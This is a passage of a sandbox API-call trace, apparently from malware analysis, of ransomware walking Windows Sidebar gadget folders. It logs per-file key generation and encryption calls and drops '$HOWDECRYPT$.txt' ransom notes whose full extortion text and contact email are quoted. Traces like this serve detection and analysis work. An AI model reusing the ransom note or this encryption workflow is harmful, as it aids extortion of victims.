Size=0x70) returned 0x31f098 [0161.422] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e888*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e888*=0x30) returned 1 [0161.422] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\library.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\library.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.452] GetProcessHeap () returned 0x2c0000 [0161.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.452] GetProcessHeap () returned 0x2c0000 [0161.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c87908 | out: hHeap=0x2c0000) returned 1 [0161.452] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e890 | out: pbBuffer=0x270e890) returned 1 [0161.452] GetProcessHeap () returned 0x2c0000 [0161.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.453] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e888*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e888*=0x30) returned 1 [0161.453] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_sml.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.462] GetProcessHeap () returned 0x2c0000 [0161.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.462] GetProcessHeap () returned 0x2c0000 [0161.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8a1c8 | out: hHeap=0x2c0000) returned 1 [0161.462] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e888 | out: pbBuffer=0x270e888) returned 1 [0161.462] GetProcessHeap () returned 0x2c0000 [0161.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.462] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e880*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e880*=0x30) returned 1 [0161.462] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.523] GetProcessHeap () returned 0x2c0000 [0161.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.523] GetProcessHeap () returned 0x2c0000 [0161.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed1bc0 | out: hHeap=0x2c0000) returned 1 [0161.523] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e888 | out: pbBuffer=0x270e888) returned 1 [0161.523] GetProcessHeap () returned 0x2c0000 [0161.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.524] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e880*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e880*=0x30) returned 1 [0161.524] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\icon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.524] GetProcessHeap () returned 0x2c0000 [0161.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.524] GetProcessHeap () returned 0x2c0000 [0161.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7f0f8 | out: hHeap=0x2c0000) returned 1 [0161.524] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.525] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.525] WriteFile (in: hFile=0x178, lpBuffer=0x270e7b7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e8e0, lpOverlapped=0x0 | out: lpBuffer=0x270e7b7*, lpNumberOfBytesWritten=0x270e8e0*=0x127, lpOverlapped=0x0) returned 1 [0161.526] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.526] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e8e0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e8e0*=0x2ac, lpOverlapped=0x0) returned 1 [0161.526] CloseHandle (hObject=0x178) returned 1 [0161.526] GetProcessHeap () returned 0x2c0000 [0161.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c87528 | out: hHeap=0x2c0000) returned 1 [0161.526] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\js\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.527] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.527] WriteFile (in: hFile=0x178, lpBuffer=0x270e7b3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e8dc, lpOverlapped=0x0 | out: lpBuffer=0x270e7b3*, lpNumberOfBytesWritten=0x270e8dc*=0x127, lpOverlapped=0x0) returned 1 [0161.528] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.528] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e8dc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e8dc*=0x2ac, lpOverlapped=0x0) returned 1 [0161.528] CloseHandle (hObject=0x178) returned 1 [0161.528] GetProcessHeap () returned 0x2c0000 [0161.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c87430 | out: hHeap=0x2c0000) returned 1 [0161.528] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e878 | out: pbBuffer=0x270e878) returned 1 [0161.528] GetProcessHeap () returned 0x2c0000 [0161.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.528] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e870*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e870*=0x30) returned 1 [0161.528] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\cpu.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\js\\cpu.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.544] GetProcessHeap () returned 0x2c0000 [0161.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.544] GetProcessHeap () returned 0x2c0000 [0161.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eec258 | out: hHeap=0x2c0000) returned 1 [0161.544] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e878 | out: pbBuffer=0x270e878) returned 1 [0161.544] GetProcessHeap () returned 0x2c0000 [0161.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.544] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e870*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e870*=0x30) returned 1 [0161.544] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\cpu.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.545] GetProcessHeap () returned 0x2c0000 [0161.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.545] GetProcessHeap () returned 0x2c0000 [0161.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eebfa0 | out: hHeap=0x2c0000) returned 1 [0161.545] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e870 | out: pbBuffer=0x270e870) returned 1 [0161.545] GetProcessHeap () returned 0x2c0000 [0161.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.545] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e868*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e868*=0x30) returned 1 [0161.545] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\drag.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.545] GetProcessHeap () returned 0x2c0000 [0161.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.545] GetProcessHeap () returned 0x2c0000 [0161.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7f020 | out: hHeap=0x2c0000) returned 1 [0161.546] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.648] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.648] WriteFile (in: hFile=0x178, lpBuffer=0x270e7a3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e8cc, lpOverlapped=0x0 | out: lpBuffer=0x270e7a3*, lpNumberOfBytesWritten=0x270e8cc*=0x127, lpOverlapped=0x0) returned 1 [0161.649] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.649] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e8cc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e8cc*=0x2ac, lpOverlapped=0x0) returned 1 [0161.649] CloseHandle (hObject=0x178) returned 1 [0161.649] GetProcessHeap () returned 0x2c0000 [0161.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed19e0 | out: hHeap=0x2c0000) returned 1 [0161.649] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e868 | out: pbBuffer=0x270e868) returned 1 [0161.649] GetProcessHeap () returned 0x2c0000 [0161.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.649] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e860*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e860*=0x30) returned 1 [0161.649] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_m.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.704] GetProcessHeap () returned 0x2c0000 [0161.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.704] GetProcessHeap () returned 0x2c0000 [0161.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed1800 | out: hHeap=0x2c0000) returned 1 [0161.704] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e868 | out: pbBuffer=0x270e868) returned 1 [0161.705] GetProcessHeap () returned 0x2c0000 [0161.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.705] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e860*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e860*=0x30) returned 1 [0161.705] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.736] GetProcessHeap () returned 0x2c0000 [0161.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.736] GetProcessHeap () returned 0x2c0000 [0161.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eebeb8 | out: hHeap=0x2c0000) returned 1 [0161.736] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e860 | out: pbBuffer=0x270e860) returned 1 [0161.736] GetProcessHeap () returned 0x2c0000 [0161.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.736] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e858*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e858*=0x30) returned 1 [0161.737] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_m.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.739] GetProcessHeap () returned 0x2c0000 [0161.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.739] GetProcessHeap () returned 0x2c0000 [0161.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed1440 | out: hHeap=0x2c0000) returned 1 [0161.739] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e860 | out: pbBuffer=0x270e860) returned 1 [0161.739] GetProcessHeap () returned 0x2c0000 [0161.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.740] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e858*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e858*=0x30) returned 1 [0161.740] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.741] GetProcessHeap () returned 0x2c0000 [0161.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.741] GetProcessHeap () returned 0x2c0000 [0161.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed1260 | out: hHeap=0x2c0000) returned 1 [0161.741] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e858 | out: pbBuffer=0x270e858) returned 1 [0161.741] GetProcessHeap () returned 0x2c0000 [0161.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.741] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e850*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e850*=0x30) returned 1 [0161.742] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_s.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.750] GetProcessHeap () returned 0x2c0000 [0161.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.750] GetProcessHeap () returned 0x2c0000 [0161.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed1170 | out: hHeap=0x2c0000) returned 1 [0161.751] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e858 | out: pbBuffer=0x270e858) returned 1 [0161.751] GetProcessHeap () returned 0x2c0000 [0161.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.751] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e850*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e850*=0x30) returned 1 [0161.751] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.765] GetProcessHeap () returned 0x2c0000 [0161.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.765] GetProcessHeap () returned 0x2c0000 [0161.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed0ea0 | out: hHeap=0x2c0000) returned 1 [0161.765] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e850 | out: pbBuffer=0x270e850) returned 1 [0161.765] GetProcessHeap () returned 0x2c0000 [0161.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.765] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e848*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e848*=0x30) returned 1 [0161.765] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_settings.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_settings.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.829] GetProcessHeap () returned 0x2c0000 [0161.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.829] GetProcessHeap () returned 0x2c0000 [0161.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaf5b8 | out: hHeap=0x2c0000) returned 1 [0161.829] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e850 | out: pbBuffer=0x270e850) returned 1 [0161.829] GetProcessHeap () returned 0x2c0000 [0161.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.829] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e848*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270e848*=0x30) returned 1 [0161.829] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_dot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.844] GetProcessHeap () returned 0x2c0000 [0161.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.844] GetProcessHeap () returned 0x2c0000 [0161.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c86d68 | out: hHeap=0x2c0000) returned 1 [0161.845] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e848 | out: pbBuffer=0x270e848) returned 1 [0161.845] GetProcessHeap () returned 0x2c0000 [0161.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.845] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270e840*=0x20, dwBufLen=0x30 | out: 